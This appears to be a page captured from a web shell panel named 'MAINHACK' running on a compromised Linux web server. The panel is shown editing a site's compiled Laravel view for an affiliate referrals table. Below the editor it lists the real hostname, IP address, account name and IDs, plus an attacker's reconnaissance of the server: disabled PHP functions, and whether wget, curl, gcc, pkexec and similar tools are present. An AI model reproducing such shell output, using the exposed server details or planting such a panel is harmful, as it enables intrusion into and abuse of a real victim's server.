[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: f530ef6569ef64c649cdbb3ed969e1b3.php
<?php $__env->startSection('content'); ?> <div class="row"> <div class="col-lg-12"> <div class="card"> <div class="card-header d-flex align-items-center"> <span class="panel-title"><?php echo e(_lang('Referrals History')); ?></span> </div> <div class="card-body"> <table id="referral_earnings_table" class="table"> <thead> <tr> <th><?php echo e(_lang('Register Date')); ?></th> <th><?php echo e(_lang('User')); ?></th> <th><?php echo e(_lang('Referrer')); ?></th> <th><?php echo e(_lang('Amount')); ?></th> <th><?php echo e(_lang('Percentage')); ?></th> <th><?php echo e(_lang('Commission')); ?></th> </tr> </thead> <tbody> </tbody> </table> </div> </div> </div> </div> <?php $__env->stopSection(); ?> <?php $__env->startSection('js-script'); ?> <script> (function ($) { "use strict"; $('#referral_earnings_table').DataTable({ processing: true, serverSide: true, ajax: _url + '/admin/affiliate/get_referrals_data', "columns" : [ { data : 'created_at', name : 'created_at' }, { data : 'name', name : 'name' }, { data : 'referrer.name', name : 'referrer.name' }, { data : 'referral_payment.amount', name : 'referral_payment.amount' }, { data : 'referral_payment.commission_percentage', name : 'referral_payment.commission_percentage' }, { data : 'referral_payment.commission_amount', name : 'referral_payment.commission_amount' }, ], responsive: true, "bStateSave": true, "bAutoWidth":false, "ordering": false, "language": { "decimal": "", "emptyTable": "<?php echo e(_lang('No Data Found')); ?>", "info": "<?php echo e(_lang('Showing')); ?> _START_ <?php echo e(_lang('to')); ?> _END_ <?php echo e(_lang('of')); ?> _TOTAL_ <?php echo e(_lang('Entries')); ?>", "infoEmpty": "<?php echo e(_lang('Showing 0 To 0 Of 0 Entries')); ?>", "infoFiltered": "(filtered from _MAX_ total entries)", "infoPostFix": "", "thousands": ",", "lengthMenu": "<?php echo e(_lang('Show')); ?> _MENU_ <?php echo e(_lang('Entries')); ?>", "loadingRecords": "<?php echo e(_lang('Loading...')); ?>", "processing": "<?php echo e(_lang('Processing...')); ?>", "search": "<?php echo e(_lang('Search')); ?>", "zeroRecords": "<?php echo e(_lang('No matching records found')); ?>", "paginate": { "first": "<?php echo e(_lang('First')); ?>", "last": "<?php echo e(_lang('Last')); ?>", "previous": "<i class='fas fa-angle-left'></i>", "next": "<i class='fas fa-angle-right'></i>" } } }); })(jQuery); </script> <?php $__env->stopSection(); ?> <?php echo $__env->make('layouts.app', \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?><?php /**PATH /home/eliosofonline/public_html/resources/views/backend/admin/affiliate/referrals.blade.php ENDPATH**/ ?>
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.85 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002